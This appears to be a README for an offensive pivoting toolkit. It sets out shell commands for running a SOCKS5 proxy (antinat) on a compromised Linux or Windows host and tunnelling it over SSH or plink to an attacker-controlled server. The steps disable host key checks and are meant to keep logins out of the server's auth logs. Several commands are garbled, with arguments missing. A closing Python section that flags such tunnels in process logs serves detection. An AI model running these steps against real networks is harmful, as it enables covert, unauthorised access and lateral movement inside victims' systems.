
Giulio 219186456b Improved instructions 1 year ago


Making pivoting into internal networks easier and faster so you can focus on the real fun :)


The idea is to run a SOCKS5 server on the compromised target and forward its local port to a remote host over SSH. A remote server, or any other means of exposing a port on the internet, is required. When an SSH server is not available, antinat comes to the rescue.



On our server

useradd -m -s /bin/nologin targetname
ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
mkdir /home/targetname/.ssh
cp /tmp/ /home/targetname/.ssh/authorized_keys
chown -R targetname:targetname /home/targetname/.ssh
chmod 600 /home/targetname/.ssh/authorized_keys
cat /tmp/sshkey

Copy the content of /tmp/sshkey (the private key).

On the compromised host

echo "my copied sshkey" >> /tmp/.keyfile
chmod 600 /tmp/.keyfile
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22: -i /tmp/.keyfile -fNT targetname@myserver

Now on your server

ssh -D compromiseduser@ -p 2222 -fNT


We can combine the antinat proxy with the above procedure so that we do not log in on the SSH server and thus do not write to its auth logs.

Instead of using the SSH SOCKS option (-D) on the server, upload the provided package and directly forward the antinat port.

./antinat -cantinat.xml
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L -i /tmp/.keyfile -fNT targetname@myserver


On a Windows target, upload the package and extract it.

Start the antinat binary; no admin permissions are required:

antinat.exe -a -cC:\temp\antinat.xml

Forward the antinat port with plink (the first command only answers the host key prompt non-interactively; its wrong password makes it exit without logging in):

echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver
plink -ssh -noagent -C -T -N -pw "password" -R targetname@myserver

PuTTY natively supports SSH via an HTTP proxy, and so does plink, but from the command line this only works if a preconfigured session already exists. More info.
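From the defender's side, the procedures above leave a recognisable shape in process command lines: ssh or plink started with a port forward (-L/-R/-D) and no remote command (-N), host key verification switched off, a password passed on the command line, or the antinat binary itself. The following Python is an added example (not part of this repository) that scores command lines against those indicators; the sample lines are constructed, with placeholder ports and hosts, not captured from a real system.

```python
import re
import shlex

# Only a token made entirely of these OpenSSH short flags is expanded letter by letter
# (so plink's -ssh, -noagent and -pw are kept whole instead of being split).
SHORT_FLAGS = set("fNTLRDCiop")
FORWARD_FLAGS = {"-L", "-R", "-D"}
HOSTKEY_BYPASS = ("StrictHostKeyChecking=no", "UserKnownHostsFile=/dev/null")
PROGRAMS = {"ssh", "plink", "antinat"}

def _program(tokens):
    """Return (name, args) for the first ssh/plink/antinat token, with any path or .exe."""
    for i, tok in enumerate(tokens):
        name = re.split(r"[\\/]", tok)[-1].lower().removesuffix(".exe")
        if name in PROGRAMS:
            return name, tokens[i + 1:]
    return None, []

def _flags(args):
    """Expand combined short flags such as -fNT into {'-f', '-N', '-T'}."""
    flags = set()
    for tok in args:
        if tok.startswith("-") and tok[1:] and set(tok[1:]) <= SHORT_FLAGS:
            flags.update("-" + c for c in tok[1:])
        else:
            flags.add(tok)
    return flags

def inspect_cmdline(cmdline):
    """List the reasons a process command line matches the tunnelling pattern ([] if none)."""
    prog, args = _program(shlex.split(cmdline, posix=False))  # non-POSIX keeps C:\ paths intact
    if prog is None:
        return []
    if prog == "antinat":
        return ["antinat: standalone SOCKS server started"]
    flags = _flags(args)
    reasons = []
    if "-N" in flags and flags & FORWARD_FLAGS:
        reasons.append(f"{prog}: port forward with no remote command (-N)")
    if any(opt in cmdline for opt in HOSTKEY_BYPASS):
        reasons.append(f"{prog}: host key verification disabled")
    if prog == "plink" and "-pw" in flags:
        reasons.append("plink: password supplied on the command line")
    return reasons

# Constructed sample command lines (not captured from a real host); the last one is benign.
SAMPLES = [
    "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -R 2222:127.0.0.1:22 -i /tmp/.keyfile -fNT targetname@myserver",
    'plink -ssh -noagent -C -T -N -pw "password" -R 2222:127.0.0.1:1080 targetname@myserver',
    r"C:\temp\antinat.exe -a -cC:\temp\antinat.xml",
    "ssh -L 8080:localhost:80 admin@jumphost",
]
```

Feed it the command-line field of your EDR or auditd process-creation events; an interactive forward without -N, like the last sample, is deliberately not flagged.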